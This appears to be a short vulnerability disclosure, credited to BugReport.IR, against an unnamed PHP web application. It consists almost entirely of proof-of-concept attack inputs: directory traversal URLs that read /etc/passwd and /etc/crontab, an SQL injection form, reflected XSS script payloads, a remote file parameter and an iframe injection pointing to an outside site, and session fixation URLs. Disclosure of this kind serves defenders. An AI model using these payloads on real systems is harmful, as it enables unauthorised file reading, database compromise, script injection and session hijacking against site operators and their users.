Directory Traversal ------------- http://www.example.com/download.php?dfile=../../../../../../etc/passwd http://www.example.com/download.php?dfile=../../../../../../../etc/crontab ------------- SQL Injection ------------- <form action="http://www.example.com/rating.php" method="post"> <input type=text name=book_id size=100 value="[SQL Injection]"><br> <input type=hidden name=user_score size=100 value=5> <input type=submit name=submit_for_rating value="Go!"> </form> ------------- Cross-site Scripting ------------- http://www.example.com/login.php?Fake=<fake><script>alert(/sdl BugReport.IR xss/)</script> http://www.example.com/hta/htmlarea.js.php?glb_sid=<script>alert(/sdl BugReport.IR xss/)</script> http://www.example.com/rss_getfile.php?file=http://BugReport.ir First of all, login into the site. Now submit this : <iframe src="http://www.BugReport.ir/" width=1000 height=1000></iframe> at: http://www.example.com/room.php?slc_lang=fa&sid=1&user_id=1 ------------- Session Fixation ------------- First, clear the site's cookies, and then goto: http://www.example.com/homepg/index.php?PHPSESSID=BugReportIRSessionFixation http://www.example.com/homepg/login.php?PHPSESSID=BugReportIRSessionFixation